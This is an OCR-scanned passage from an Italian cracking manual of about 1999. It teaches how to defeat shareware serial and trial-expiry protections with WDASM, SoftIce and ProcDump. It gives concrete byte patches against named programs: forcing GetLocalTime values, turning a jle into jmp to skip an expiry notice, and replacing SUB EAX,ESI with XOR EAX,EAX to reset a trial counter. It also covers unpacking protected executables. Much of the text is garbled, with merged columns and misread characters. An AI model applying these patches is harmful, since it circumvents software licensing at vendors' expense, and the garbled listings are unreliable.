WORD wId; 
switch(message) 


case WM_INITDIALOG: 
return BLD_NOMEFORClicked104blgbefault(hDlg,message,wParam, 1Param); 
break; 


case WM_COMMAND: 
wId=LOWORD(wParam) ; 
switch(wId) 


{ 

default: 
return BLD_NOMEFORClicked104Dblgbefault(hDlg,message,wParam, 1Param); 
break; 


} 


break; 


default: 
return BLD_NOMEFORClicked104Dblgbefault(hDlg,message,wParam, 1Param); 
break; 


return TRUE;// Did process the message 


} 


Come potete vedere la funzione riceve sempre tre parametri, quelli di cui 
abbiamo parlato prima. 

WDASM quando individua una call ad una funzione in genere mostra simbolicamente 
i parametri. 

Guardate i dati che seguono relativi ad una qualsiasi call. 


API LPTSTR Arg00 = GetCommandLineA(Arg01) 
API Address=0040EE5E, API Return Address=0040EE64 
Arg01 = (void) 


RESULT for API GetCommandLineA 
Arg00 = (LPTSTR) 815fb28c -> " " 
Arg01 = (void) 


Ritornando al discorso relativa alla funzione per la lettura dei numeri di 
serializazione possiamo dire che i caratteri possono essere anche inseriti in 
modo asincrono intercettando ogni singolo messaggio di scrittura dei caratteri. 
Accertatevi che non avvenga qualche sostituzione di qualche procedura legata a 
qualche window mediante le funzioni API SetWindowLong(). 


NewStatic = (FARPROC) MakeProcInstance((FARPROC) NewStaticProc, hInst); 
OldStatic = (FARPROC) GetWindowLong(GetDlgItem(hDlg,148),GWL_WNDPROC); 
SetWindowLong(GetDlgItem(hDlg,148), GWL_WNDPROC, (LONG) NewStatic); 


Le precedenti linee creavano un istanza legata alla nuova funzione di gestione 
della window, che in questo caso è un campo d’edit (GetDlgItem(hDlg, 148)), e 


salvano la vecchia in modo da poterla ripristinare o richiamare quando la si 
vuole. 

Volendo creare una funzione di lettura particolare legata ad un campo d’edit la 
si potrebbe abbinare e quindi fargli eseguire la lettura tramite una metodologia 
come quella precedente. 

Con SoftIce è possibile settare breakpoint generici con l’unico selettore basato 
sull’handle della finestra. 

Il problema è che la window di SoftIce continuerebbe a comparire in 
continuazione rendendo impossibile il lavoro. 

Spesso le funzioni di registrazione aprono dei files normali per leggere e 
scrivere informazioni. 

Alcune utilities sono in grado di dare, tra le altre informazioni, anche il 
numero e il nome dei files aperti in un certo istante. 

Ricordiamoci sempre che il sistema operativo gestisce un certo numero di tabelle 
con dentro le informazioni di tutto ciò che capita nel sistema. 

Basta sapere dove andarle a leggere o al limite quale utility usare. 

TaskInfo è una recente utility che riesce a fornire le informazioni anche dei 
file aperti. 


TaskInfo v.1.5 for Windows 95/98 

Copyright (C) 1998,1999 by Igor Arsenin. All rights reserved. 
Mail: taskinfo@iarsn.com 

WWW: http://www.iarsn.com/downloads 


Prima di terminare questa 
prefazione relative alle 
scelte bisogna ancora 
approfondire alcuni concetti. 


System Di All Open Files 


236 CP_R251.NLS CAWindows\SYSTEM\CP_1251.NLS Al 
237 CP_1250.NLS C:\Windows\SYSTEM\CP_1250.NLS 


238 CP_1253NLS C:\Windows\SYSTEM\CP_1253NLS Inizialmente si parlava del 

239. MSO7ITA. DLL CAProgrammi\Microsoft Office\Office\MSO7ITA DLL reg istro e si diceva che se si 
240. “WRS0000.tmp DATEMP\"WRS0000.1mp E di india d 

241 CRYPT32DLL C:AWindows\SYSTEM\CRYPT32.DLL riesce ad Individuare cdove 

242 MSOSS.DLL C:Windows\SYSSTEM\MSOSS.DLL sono memorizzate alcune 


sono PREDA EL OfficeWM odelli\Normal.dot informazioni si po trebbe 


risparmiare il lavoro per 
andare a vedere come si 


serializza il programma. 

Se, ad esempio, ci fosse un voce di registro in cui viene memorizzato il numero 
di giorni di durata del programma lo si potrebbe mettere a 100.000 rendendo 
quindi inutile la serializzazione. 

Il registro può essere considerato un evoluzione dei file .INI anche se di fatto 
l’introduzione di questo concetto non ha reso obsoleti certi file .ini come ad 
esempio il win.ini. 


PROTOTIPI ASSEMBLER 

Se uno volesse farsi un idea di come alcuni costrutti del C vengono tradotti i 
assembler dal compilatore potrebbe creare delle micro funzioni e farle compilare 
con la sintassi che avevo riportato in uno dei capitoli iniziali. 

Ripeto la linea di comando 


cl /c /Fanome.asm nomefile.c 


Per fare un esempio, volendo farsi l’idea di come il compilatore crea alcuni 


costrutti legati al IF è possibile crearsi un programma del tipo 
#include <string.h> 

Char str1[20], str2[20]; 

void dump_funct() {} 


void funzione _if(void) 


int a = 0; 


if(a == 1) { 
dump_funct(); 
} 


if(a< 1) { 
dump_funct(); 
} else { 
dump_funct(); 
} 


if(strcmp(str1,str2)) 
dump_funct(); 


if(!strcmp(str1,str2)) 
dump_funct(); 


if(strcmp(str1,str2)) 
dump_funct(); 
else 
dump_funct(); 


} 


Avrete capito che dump_funct() serve solo a fare una chiamata fittizia. 

La compilazione deve avvenire anche con l’ottimizzatore staccato (/0d) perchè 
con un sorgente come il precedente vi darebbe l'impressione di aver bloccato il 
computer. 

In pratica non sarebbe bloccato ma solo in pausa perchè non riuscirebbe più a 
smettere di ridere ! 

Ecco la traduzione del compilatore con tanto di numero di linea a cui si 
riferisce. 


TITLE funzioni.c 
.386P 
include listing.inc 
if @Version gt 510 


.model FLAT 
else 
_ TEXT SEGMENT PARA USE32 PUBLIC 'CODE' 
_TEXT ENDS 
_DATA SEGMENT DWORD USE32 PUBLIC 'DATA' 
_DATA ENDS 
CONST SEGMENT DWORD USE32 PUBLIC 'CONST' 
CONST ENDS 
_BSS SEGMENT DWORD USE32 PUBLIC 'BSS' 
_BSS ENDS 
_TLS SEGMENT DWORD USE32 PUBLIC 'TLS' 
_TLS ENDS 
FLAT GROUP _DATA, CONST, _BSS 

ASSUME CS: FLAT, DS: FLAT, SS: FLAT 
endif 


_DATA SEGMENT 
COMM _str1:BYTE:014H 
COMM _str2:BYTE:014H 
_DATA ENDS 
PUBLIC _dump_funct 
_TEXT SEGMENT 
_dump_funct PROC NEAR 

File funzioni.c 
; Line 5 

push ebp 


mov 


pop 
ret 


ebp, esp 
ebp 
0 


_dump_funct ENDP 


_TEXT ENDS 
PUBLIC 


_a$ = -4 


_funzione_if 
EXTRN _stremp:NEAR 
_TEXT SEGMENT 


_funzione_if PROC NEAR 


; Line 8 
push 
mov 
push 

; Line 9 
mov 

; Line 11 
cmp 
jne 

; Line 12 
call 

$L118: 

; Line 15 
cmp 

_ j9e 

; Line 16 
call 

; Line 17 
jmp 

$L119: 

; Line 18 
call 

$L120: 

; Line 21 
push 
push 
call 
add 
test 
je 

; Line 22 
call 

$L121: 

; Line 24 
push 
push 
call 
add 
test 
jne 

; Line 25 
call 

$L122: 

; Line 27 
push 
push 
call 
add 
test 
je 

; Line 28 
call 

; Line 29 


ebp 
ebp, esp 
ecx 


DWORD PTR _a$[ebp], © 


DWORD PTR _a$[ebp], 1 


SHORT $L118 


_dump_funct 


DWORD PTR _a$[ebp], 1 


SHORT $L119 
_dump_funct 


SHORT $L120 


_dump_funct 


OFFSET FLAT 
OFFSET FLAT 
_Strcmp 
esp, 8 

eax, eax 
SHORT $L121 


_dump_funct 


OFFSET FLAT 
OFFSET FLAT 
_Strcmp 
esp, 8 

eax, eax 
SHORT $L122 


_dump_funct 


OFFSET FLAT 
OFFSET FLAT 
_Strcmp 
esp, 8 

eax, eax 
SHORT $L123 


_dump_funct 


:_str2 
:_stri 


:_str2 
:_stri 


:_str2 
:_stri 


jmp SHORT $L124 


$L123: 
; Line 30 
call _dump_funct 
$L124: 
; Line 33 
mov esp, ebp 
pop ebp 
ret 0 
_funzione_if ENDP 
_TEXT ENDS 
END 


Il primo if corripondente a 


if(a == 1) { 
dump_funct(); 
} 


Viene tradotto con 


; Line 11 
cmp DWORD PTR _a$[ebp], 1 
jne SHORT $L118 

; Line 12 
call _dump_funct 

$L118: 


Questo aiuta a capire che quando ci si trova dinanzi a costrutti che utilizzano 
ebp ed esp è probabile che si riferiscano a variabili automatiche gestite nello 
stack. 

Esistono casi in cui una prima analisi potrebbe indurre a pensare che forse è il 
caso di lasciare perdere. 

Se per trovare il codice di un programma per formattare un sorgente C pretende 3 
settimane di lavoro 

Che cosa potrebbe indurre a desistere ? 

Come avevo detto prima nella fase iniziale bisognerebbe cercare di ricavare più 
informazioni possibili sul target. 

In questo caso, già solo richiedendo informazioni con QuickViewPlus, viene 
mostrata una tabella di questo tipo 


MERE Qui sono state troncate 


Name: CCRWINN.EXE 
Characteristics: 00000000 
Time Date Stamp: 00000000 

Version: 0.00 

Base: 00000001 

Number of Functions: 00000006 
Number of Names: 00000006 


Ordinal Entry Point Name 
0002 00001074 @ExecWait@EnumWndProc$qqsp6HWND__1 


0001 00009974 
@TMainWindow@DDECallBack$qqsususp7HCONV__p5HSZ__t4p10HDDEDATA__ulul 

0004 0007bad4 @__lockDebuggerData$qv 

0005 0010429c @__unlockDbebuggerData$qv 

0003 000d5d88 _ bebuggerHookData 

0000 000d5db0 _ GetExceptDLLinfo 


Import Table 


AmP 
Ordinal Function Name 


616d phore error 


6f40 P 
6f50 P 
6f6a P 
6f8d P 
6fa9 P 
6fc5 P 
6fde P 
0050 ùoP 
0050 

005a 

00d4 

0130 

006e Tue 
4d00 onday 
6164 y 
6164 y 
6265 

4d00 ay 
5300 ep 
6365 

0079 March 
006c May 
7541 gust 
626d er 
766f ember 
626d er 
5occ Q 
0000 

7494 A 

mP 

Ordinal Function Name 


6547 tTickCount 
4665 ile 

736f eHandle 
736c trlenA 
6c47 obalSize 
0000 

6f6d ryStatus 
0000 _lopen 


416c lloc 
00 GetVersion 
Beh! 
Già quelle funzioni tipo 
Notice ell @ lockbebuggerbataggv mi fanno indugiare. 
E na 3 ì Poi il macello sulle funzioni importate mi 
This PE File is not in Standard Windows Format. fanno pensare che effettivamente il 


All Data References will be terminated. 


lockDebuggerData faccia qualche cosa. 

Inoltre l’uso di certi programmi che eseguono 
la decodifica si piantano brutalmente. 

In ogni caso quando vengono segnalati messaggi 
di questo tipo prima di piangere provate a 
seguire una procedura come quella che segue. 


Il programma in questione, cercando di 
caricarlo con WDASM, segnala il seguente 
messaggio. 
Caricate PROCDUMP (guardate il capitolo sul 
software) e selezionate il pulsante UNPACK. 
Specificate il nome del programma andandolo 
a cercare e selezionandolo dalla lista. 
Quando vi viene mostrata la finestra in cui 
selezionare il metodo di packing selezionate 
Salo la prima relativa al metodo SCONOSCIUTO (a 
Chasdand meno che non lo conosciate). 
box Dialog Sl PROCDUMP  caricherà il programma e vi 
segnalerà tramite una MessageBox di premere 
un tasto a caricamento avvenuto. 


Choose Unpacker 


*Unknown* 
Hasiuk/NeoLite 
Manolo 
FPEPack 
PESHIELD 
Petite 

Petite2 


PROCDUMP inizierà a lavorare 
Unpacker Status N mostrandovi a video lo scorrere dei 
Tracer Status: bytes analizzati. 


Ricordatevi quanto appena detto ovvero 
di premere il pulsante solo dopo che 


Breakpoint reached at 0x005653DA il programma è stato avviato da 
PROCDUMP. 
Terminato il lavoro di decodifica, se 


Traced Lines: 000OFEOOh Script EIP: 005653DAh andato a buon esito, vi verrà 
fi 7 richiesto di assegnare un nome al file 

di cui eseguire il dump. 

Il file deve avere estensione .EXE in 

quanto, come il file che lo ha generato, è il file eseguibile con le 

informazioni normalizzate. 

Prima di continuare provate a fare la prova più semplice di tutte, ovvero 

provate a lanciare il programma per vedere se non ci sono problemi. 

Sicuramente il 

file avrà una 
dimensione 

diversa. 

Il più grosso 

WinHack2.exe 456192 |1E a è quello 

E ° creato da 

PROCDUMP (nel 


mio caso). 

Come abbiamo detto all’inizio dell'argomento WDASM segnalava che il file aveva 
il PE in un formato non standard e cercando di visualizzare le funzioni 
importate ne venivano mostrate pochissime. 

Adesso caricando il programma con WDASM e visualizzando le funzioni importate 
vengono mostrate tutte (questa è solo l’inizio ma si vedono già funzioni 
importanti per verificare i codici ... in questo caso infatti viene letto dal 
registro © ). 


advapi32.RegCloseKey comct132.ImageList_BeginDrag 
advapi32.RegCloseKey comct132.ImageList_Create 
advapi32.RegCreateKeyExA comct132.ImageList_Destroy 
advapi32.RegDeleteValueA comct132.ImageList_DragEnter 
advapi32.RegFlushKey comct132.ImageList_DragLeave 
advapi32.RegOpenKeyExA comct132.ImageList_DragMove 
advapi32.RegOpenKeyExA comct132.ImageList_DragShowNolock 
advapi32.RegQueryValueExA comct132.ImageList_Draw 
advapi32.RegQueryValueExA comct132.ImageList_DrawEx 


advapi32.RegSetValueExA 
comct132.ImageList_Add 
KERNEL32.BeginUpdateResourceA 


Questo invece era l’inizio (e quasi KERNEL32.CloseHandle 
la fine) del programma non processato KERNEL32.ConnectNamedPipe 
da PROCDUMP). KERNEL32.ContinueDebugEvent 


KERNEL32.CreateFileA 


KERNEL32.CreateFileMappingA KERNEL32.DeleteFileA 


KERNEL32.CreateMutexA KERNEL32.DeviceIoControl 
KERNEL32.CreateSemaphoreA KERNEL32.EndUpdateResourceA 
KERNEL32.DebugActiveProcess KERNEL32.EnterCriticalSection 


KERNEL32.,DeleteCriticalSection 


Generalmente un sistema TimeLock è composto da più file tra i quali ne esiste 
uno in formato normale che contiene le (o la) funzioni che decodificano le 
altre. 

Se si cerca di leggere le informazioni di un file prima che questo venga 
decodificato sicuramente verranno fuori amenità o in ogni caso un numero 
sicuramente inferiore all'effettivo. 

Alcuni programmi che effettuano il dump servono appunto a ricreare le testata 
dei programmi dopo che il software originale lo ha decodificato. 

Nella parte legate al sistema di Timelock chiamato VBOX approfondiremo il 
discorso sui PE codificati e sul metodo di attendere che il programma stesso 
esegua la decodifica per poi creare dei DUMP con programmi come SoftDump, 
ProcDump o similia. 

Una nota particolare riguarda la scelta del debugger. 

Spesso un programma utilizza la libreria relativa alla macchina virtuale di 
visual basic o comunque è scritto in un linguaggio con funzioni proprie che 
rendono difficile l’interpretazione delle routines per la serializzazione. 
Quando vedete che un programma importa le funzioni da MSVBVM60.DLL allora potete 
stare sicuri che questa libreria a sua volta richiama le varie funzioni API di 
Windows presenti in Gdi32.DLL, USER32.DLL ecc. 

Potendo intercettare queste funzioni potreste cercare le varie GetDlgItemTextA 
ecc. 

Debugger come WDASM vi mostrano una finestra in cui compaiono le funzioni 
importate e l’unico modo per settare dei breakpoint sull’intercettazione di 
queste è quello di clickare su quelle desiderate. 

Potreste usare il metodo di importare voi le librerie settando poi degli 
abbinamenti con programmi attivi, ma non saprei dirvi con precisione se è una 
tecnica utilizzabile sempre. 

Debugger come Softice possono eseguire l’import da WINICE.DAT delle DLL 
contenenti le varie funzioni GetDlgItemTextA ecc. per cui se la funzione di VB 
6.0 utilizzerà quella allora l’intercettazione potrà essere fatta semplicemente. 
Ecco la copia di un winice.dat in cui sarà sufficente eliminare il rem dinanzi 
alla DLL per eseguire l'import. 


; WINICE.DAT 
7 (SIW95\WINICE.DAT) 
; for use with SoftICE Version 3.2 (Windows 95) 
; 14 July 1997 
1 KEKKKAKKKKAKKKAKKKAKAKKAKKKAKAKKAKKKAKAKKKAKKKAKAKKKAKKAKKAKAKAKKKAKKAKKAKAKKAKKAKKAAKKAKKAKKAKAKKAKKAKAKKAKKAKAKAA 
7 If your have MORE than 32MB of physical memory installed, change 
; the PHYSMB line to the correct # of Megabytes. 
7 If you have LESS than 32MB you can save a bit of memory by 
;j specifying the correct # of Megabytes 
f KKKKAKKKKAKKKKAKKKAKAKKKAKKKAKAKKKAKKKAKAKKKAKKKAKAKKKAKKKAKAKKAKKAKKAKAKKAKKAKKAAKKAKAKKAKKAKAKKAKKAKAKKAKKAKAKKA 
; ***** Examples of sym files that can be included if you have the SDK ***** 
; Change the path to the appropriate drive and directory 
;LOAD=c:\windows\system\user.exe 
;LOAD=c:\windows\system\gdi.exe 
;LOAD=c:\windows\system\krnl386.exe 
; LOAD=c:\windows\system\mmsystem.dll 
;LOAD=c:\windows\system\win386.exe 
***** Examples of export symbols that can be included ***** 
; Change the path to the appropriate drive and directory 
;EXP=c:\windows\system\vga.drv 
;EXP=c:\windows\system\vga.3gr 
;EXP=c:\windows\system\sound.drv 
;EXP=c:\windows\system\mouse .drv 
;EXP=c:\windows\system\netware.drv 


;EXP=c:\windows\system\system.drv 
;EXP=c:\windows\system\keyboard.drv 
;EXP=c:\windows\system\toolhelp.dll 
;EXP=c:\windows\system\shell.dll 
;EXP=c:\windows\system\commdlg.dll 
;EXP=c:\windows\system\olesvr.dll 
;EXP=c:\windows\system\olecli.dll 
;EXP=c:\windows\system\mmsystem.dll 
;EXP=c:\windows\system\winoldap .mod 
;EXP=c:\windows\progman.exe 
;EXP=c:\windows\drwatson.exe 

***** Examples of export symbols that can be included for Windows 95 ***** 
; Change the path to the appropriate drive and directory 
;EXP=c:\windows\system\advapi32.dll 
;EXP=c:\windows\system\shell232.dl1l 
;EXP=c:\windows\system\comct132.dl1l 
;EXP=c:\windows\system\crtdll.dll 
;EXP=c:\windows\system\version.dll 
;EXP=c:\windows\system\netlib32.dl1l 
;EXP=c:\windows\system\msshrui.dll 
;EXP=c:\windows\system\msnet32.dll 
;EXP=c:\windows\system\mspwl32.dll 
;EXP=c:\windows\system\mpr.dll 


In altre parole un linguaggio xx potrebbe avere delle funzioni sue per leggere 
un campo d’edit. 

Se la libreria si supporta sulle API di Windows significherà che questa 
utilizzerà appunto queste ultime per l’esecuzione della funzionalità. 

Nel capitolo relativo alle librerie esiste un ampliamento del discorso relativo 
al MSVBVM60.DLL. 

Potremmo avere una funzione LeggiEditField() che si supporta su GetDlgItemTextA. 
Se non siete specializzati nel linguaggio potete solo andare ad intuito per 
capire quali funzioni svolgono un certo compito e generalmente lo si può fare 
solo dal nome. 

Potendo intercettare alla base la funzione su cui si basa allora semplificherete 
il tutto. 


CAMBIO DEI PARAMETRI DELLA DATA DI EXPIRE 


Se partiamo dal presupposto che alcuni programmi controllano la data per sapere 
se il programma è scaduto, possiamo immaginare due possibili tecniche. 

La prima parte dal presupposto che da qualche parte il programma legge la data 
attuale per confrontarla con quella di installazione. 

Se quando installiamo il programma eseguiamo subito la modifica potremmo sperare 
nel corretto funzionamento di una metodologia di questo tipo. 

Supponiamo che la data di installazione sia 12/09/1999. 

Indipendentemente da dove si registra la data di installazione è sufficente che 
modifichiamo la chiamata a GetLlocalTime o della funzione che il programma 
utilizza per leggere il tempo facendo in kodo che questa restituisca sempre la 
data 12/09/1999. 

Prendiamo ilo programma xxxxx.exe e carichiamolo con WDASM. 

Cerchiamo le funzioni che restituiscono il tempo (guardate il capitolo delle 
API). 

Nell'esempio esiste solo GetLocalTime. 


kernel32.GetLocaleInfoA 
kernel32.GetLocalTime 
kernel32.GetLogicalDrives 


Settiamo un breakpoint e attendiamo che si fermi. 


Nell’istante in cui si attiva il breakpoint possiamo vedere la chiamata alla 
funzione. 


API void Arg00 = GetLocalTime(Arg01) 
API Address=00405A68, API Return Address=00408465 
Arg01 = (LPSYSTEMTIME) 0069fc6c 

Arg01->st.wYear = 49024 decimal 
Arg01->st.wMonth = 16609 decimal 
Arg01->st.wDbayOfWeek = 31342 decimal 
Arg01->st.wDay = 68 decimal 
Arg01->st.wHour = 64640 decimal 
Arg01->st.wMinute = 105 decimal 
Arg01->st.wSecond = 31356 decimal 
Arg01->st.wMilliseconds = 68 decimal 


RESULT for API GetLocalTime 

Arg00 = (void) 

Arg01 = (LPSYSTEMTIME) 0069fc6c 
Arg01->st.wYear = 1999 decimal 
Arg01->st.wMonth = 9 decimal 
Arg01->st.wDayOfWeek = 4 decimal 
Arg01->st.wDay = 16 decimal 
Arg01->st.wHour = 0 decimal 
Arg01->st.wMinute = 56 decimal 
Arg01->st.wSecond = 47 decimal 
Arg01->st.wMilliseconds = 680 decimal 


Il codice mostrato è il seguente 
* Reference To: kernel32.GetLocalTime, Ord:0000h 


| 
100408460 E803D6FFFF Call 00405A68 


100408465 668B4C240E mov Cx, word ptr [esp+0E] 
:0040846A 668B54240A mov dx, word ptr [esp+0A] 
:0040846F 668B442408 mov ax, word ptr [esp+t08] 
:00408474 E81FFEFFFF call 00408298 


I registri cx, dx, ax contengono (da notare che oggi al mio computer è il 
16/9/99) 


EAX=000007CF -> AX=07CF -> DECIMALE 1999 
ecx=ca0a0010 -> CX=0010 -> DECIMALE 16 
edx=bffc0009 -> DX=0009 -> DECIMALE 9 


Se la data di installazione del programma fosse quella odierna potrei settare 
delle costanti modificando le istruzione mov cx, word ptr [esp+0E] ecc. con 


MOV CX, 0010 
MOV — AX, 07CF 
MOV DX, 0009 


Il secondo metodo è quello invece di andare a vedere dove viene fatto il 
controllo sul numero di giorni. 
La ricerca può avvenire anche cercando la segnalazione del program EXPIRED. 


:00447AA8 837DE81E cmp dword ptr [ebp-18], 0000001E 
:00447AAC 7E40 jle 00447AEE 
:00447AAE 6430 push 00000030 


* Possible StringData Ref from Code Obj ->"Expiration Notice" 


| 
:00447AB0 68847D4400 push 00447D84 


* Possible StringData Ref from Code Obj ->"Your trial period for Directory " 
->"Printer has " 


| 
:00447AB5 68987D4400 push 00447D98 


:00447ABA 8B45FC mov eax, dword ptr [ebp-04] 
:00447ABD E83AB2FDFF call 00422CFC 
:00447AC2 50 push eax 


* Reference To: user32.MessageBoxA, Ord:0000h 


:00447AC3 E8FOE5FBFF Call 004060B8 


:00447AC8 8B45FC mov eax, dword ptr [ebp-04] 
:00447ACB 8B8064020000 mov eax, dword ptr [eax+00000264] 
:00447AD1 33D2 xor edx, edx 


Se il programma arrivasse a 00447AC3 (4 righe qui sopra) segnalerebbe il 
messaggio di EXPIRED per cui nella seconda riga sarà sufficiente sostituire il 
salto jle 00447AEE con un IMP fisso, salto che gli farebbe saltare il messaggio 
di expired e quindi 


:00447AAC EB40 jmp 00447AEE 
:00447A9D call DIRPRINT.00402994 

:00447AA2 sub ebx, eax 

:00447AA4 inc ebx 

:00447AA5 mov dword ptr [ebp-18], ebx 

:00447AA8 cmp dword ptr [ebp-18], 0000001E 
BP*:00447AAC jmp DIRPRINT.00447AEE 


Dopo quest’ultima istruzione premete F9 


iN This is a 30-day evaluation version and will stop sn pe n i > E si SI È 5 n + i are. 


functioning after that period if not registered. 


You are now on day 72 of the trial period. non senso del messaggio che vi dice 

“Questa è una versione a 30 giorni di 
Please read the on-line help or the README.TXT file prova ... voi siete al 72 esimo giorno 
for information on registration. dei 30 ...”. 


FUNZIONI DI FORMATTAZIONE DEL TESTO 


Alcune volte vengono mostrate, dal programma in analisi, delle stringhe che sono 
state chiaramente formattate 


Wil |leTTTWT.|./ rm: ENr-s 2I] da funzioni quali wsprintf() 


ator- untitled {Evaluation day 22 of 30) ol] esa > “costole: duetti 


als Heln funzione si trova il codice che 
segue. 

:004067C4 E8E7810100 Call 0041E9B0 

:004067C9 A1E8CE4200 mov eax, dword ptr [0042CEE8] 

:004067CE 83C0E2 add eax, FFFFFFE2 

:004067D1 50 push eax 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:004067A1(U), :004067C0(U) 


| 
:004067D2 6860A34200 push 0042A360 
:004067D7 6820CF4200 push 0042CF20 


* Reference To: USER32.wsprintfA, Ord:02ACh 


| 
:004067DC FF15BC524200 Call dword ptr [004252BC] 
:004067E2 A1E8CE4200 mov eax, dword ptr [0042CEE8] 
:004067E7 83C40C add esp, 0000000C 


Prima della chiamata a wsprintf ci sono tre push che servono a passare i 
parametri. 
Le due push con indirizzo fisso equivalgono alla stringa 


(Evalutation day %d of %d) 


Il valore dei giorni di attivazione viene passato tramite il registro EAX. 

Come è possibile vedere prima che avvenga il push di EAX il valore di EAX viene 
settato con il valore contenuto all’indirizzo 0042CEE8. 

Questo significa che questo indirizzo viene utilizzato per mantenere i giorni di 
attivazione. 

Andiamo a cercare con la funzione di ricerca dove viene assegnato questo valore 
con qualche istruzione tipo 


mov dword ptr [0042CEE8], ..... qualche valore 


Provate a cercare anche solo la stringa 0042CEE8. 
L'unica assegnazione a quell’indirizzo è stata trovata a 004066E9 


:004066DA E851FEFFFF call 00406530 

:004066DF A3E4A24200 mov dword ptr [0042A2E4], eax 
:004066E4 2BC6 sub eax, esi 

:004066E6 40 inc eax 

:004066E7 3BC3 cmp eax, ebx 

:004066E9 A3E8CE4200 mov dword ptr [0042CEE8], eax 
:004066EE 7E05 jle 004066F5 

:004066F0 BD01000000 mov ebp, 00000001 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004066EE(C) 


| 
:004066F5 68C0AF4200 push 0042AFCO 


A questo punto potremmo solo provare a settare un altro valore. 

Il problema ora è trovare il modo per inserire dei codici che non vadano a 
modificare con la loro lunghezza i codici operativi già esistenti. 

Ad esempio l'istruzione SUB EAX, ESI ha come lunghezza operativa 2 bytes (2BC6). 
Ho scelto quell’istruzione perchè modifica solo EAX. 

L'istruzione XOR EAX, EAX ha la lunghezza del codice operativo di 2 bytes che 
va giusto bene. 

Il codice operativo è 


31C0 XOR EAX, EAX 


In pratica dopo questa istruzione messa al posto di SUB EAX,ESI EAX varrà 0 per 
cui il successivo INC EAX incrementerà EAX portandolo a 1. 

Se la teoria funziona all'indirizzo 0042CEE8, che contiene il numero di giorni 
di attivazione, troveremo 1 e quindi il programma crederà di essere attivo da 
solo 1 giorno. 

Proviamo a fare la patch e lanciamo il programma. 

La patch 


:004066E4 31C0 xor eax, eax 
modificherà il codice in 


:004066D1 push eax 
:004066D2 mov byte ptr [espt16], bl 


:004066D6 mov byte ptr [espt17], bl 
:004066DA call MUEDIT.00406530 
:004066DF mov dword ptr [0042A2E4], eax 
BP*:004066E4 xor eax, eax <----.--.--- QUI 
1004066E6 inc eax 
:1004066E7 cmp eax, ebx 
BP*:004066E9 mov dword ptr [0042CEE8], eax 
:1004066EE jle 004066F5 
:004066F0 mov ebp, 00000001 


Come vedete la lunghezza del codice operativo è giusta, uguale come lunghezza a 
quella di prima, per cui il codice non 
sfasa. 


x Ora premiamo F9 e _..... 
d {Evaluation day 1 of 30) BE Chiaramente dovremo intercettare il 


settaggio prima che venga fatto 
pr = Le qualsiasi controllo atto a definire l’ 
EXPIRED del codice. 


| 


Comunque sarà probabile che se viene 
mantenuta un variabile in memoria i 
controlli avvengano in corrispondenza 
dell’assegnazione a questa. 

Questo metodo non vale se il numero 
di giorni viene solo calcolato e 
mantenuto in variabili temporanee 


SO Microangelo 98° 


30-Day Evaluation (locali) usate sull’istante. 

This sofi vare mey ba insialled and evalusted I p rog rammi che man tengono nel 

for 30 days to nsurettat i nesta you: necds caption il numero dei giorni è 

Use of this sofisre stter the 30-day evalustion probabile che 1Nnvece tengano la 
F® rea espredile crorititeg variabile globale e che quindi il 


metodo appena visto sia valido. 


4 3, 
(SÒ 
tI i 
IR | àgles | i HawtaLicense... ; QuitNow | 
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DLL CHIAMATE E RICERCA DELLE FUNZIONI 


Relativamente alle funzioni di alcune 
DLL bisogna osservare alcuni comportamenti legati ad alcune di queste. 
Certe DLL come ad esempio KERNEL32.DLL vengono lette in aree di memoria 
condivise e quindi trattate come read only. 
In queste zone non è possibile settare dei breakpoints e tantomeno andare a 
modificare la memoria. 
In ogni caso è possibile per molte altre DLL andare a inserire dei breakpoint ed 
eseguire modifiche. 
Quand’è che viene utile gestire librerie e DLL ? 
Quando esistono funzioni sufficientemente generiche da potere essere utilizzate 
in più di una circostanza allora è possibile inserire in una DLL tali funzioni. 
Esistono dei software composti da più file eseguibili. 
Prendiamo ad esempio Microangelo che serve a gestire icone e librerie di icone. 
La versione shareware quando viene attivata mostra la seguente maschera. 
Il pacchetto comunque è composto da quattro 
o cinque programmi i quali eseguono il 
controllo per vedere se i giorni del 
dimostrativo non sono stati superati. 
Sicuramente le funzioni che eseguono il 
controllo sono state inserite dentro ad una ) Explorer 
DLL e non duplicate dentro a ciascun file. FL] 
In questo caso attivando ciascun programma 
ed andando a vedere si nota che c’è sempre 
la dll E:\MICROANGELO\MUAPP.DLL attivata in 
memoria. 
In WDASM esiste una finestrella che mostra le DLL attive. 


Active DLIS convl 
ADVAPI3Z.DLL 
COMNCTL32.DLL 

COMDLG32.DLL E 


[ Proc Create Brk 
I Proc Exit Brk 
[ Thrd Create Brk 
|jrnra Exit Brk 
[DLL Load Brk 
DLL UnLoad Brk 


2 Animator 


Librarian 


[A Studio 


E’ sufficente selezionare una DLL dalla lista e clickarci sopra per avere 
proposta la domanda se si vuole disassemblarla. 

Come avevo già detto precedentemente, esistono anche dei marcatori, visibili 
anche nel disegno qui a fianco, che permettono di settare dei breakpoint ogni 
volta che il programma chiama una DLL e ogni volta che la scarica dalla memoria. 
Da questo bisognerebbe apprendere la logica dei programmi demo ad eseguibili 
multipli. 

Quando vi accoirgete che un programma viene distribuito con diversi file 
eseguibili e che ciascuno di questi esegue il controllo del tempo di attivazione 
o quello che lo limita a demo allora sicuramente le funzioni sono inserite in 
qualche DLL. 

Caricate il programma e mentre questo è fermo sulla maschera che vi segnala 
quanti giorni avete a disposizione, lanciate TaskManager o qualsiasi utility che 
vi mostri quali file e dll sono attive in memoria. 

Accertatevi dal percorso o da qualche elemento che vi permetta di capirlo quali 
o quale dll è relativa al programma interessato. 

A questo punto prendete ScanBin o un altro programma come QuickView che vi 
mostri i dati di quella DLL tra cui funzioni esportate ecc. 

Se il nome della funzione è abbastanza esplicito da farvi capire che si tratta 
della funzione di controllo allora sapete già dove andare a mettere le mani. 

In caso contrario caricate WDASM o SoftIce e dopo aver disassemblato il 
programma andate a leggere la DLL cercando di mettergli dentro qualche 
breakpoint. 

Sicuramente il numero dei giorni verrà letto in qualche voce di registro o da 
qualche file. 

In ogni caso sicuramente deve esserci qualche chiamata a funzioni che 
restituiscano la data corrente. 

Chiaramente gli algoritmi sono abbastanza complessi per evitare che l’utente 
possa portare indietro l’orologio di sistema o che faccia qualche cosa per 
imbrogliare il software. 

Generalmente i 
software devono 
proteggersi contro il 
tempo che stà per 


scadere ma anche 

contro le 

reinstallazioni. 

I software 

memorizzano sempre 

due date ovvero 
quella 


d’installazione e quella in cui un software è scaduto in 
modo tale che non possa più essere installato. 

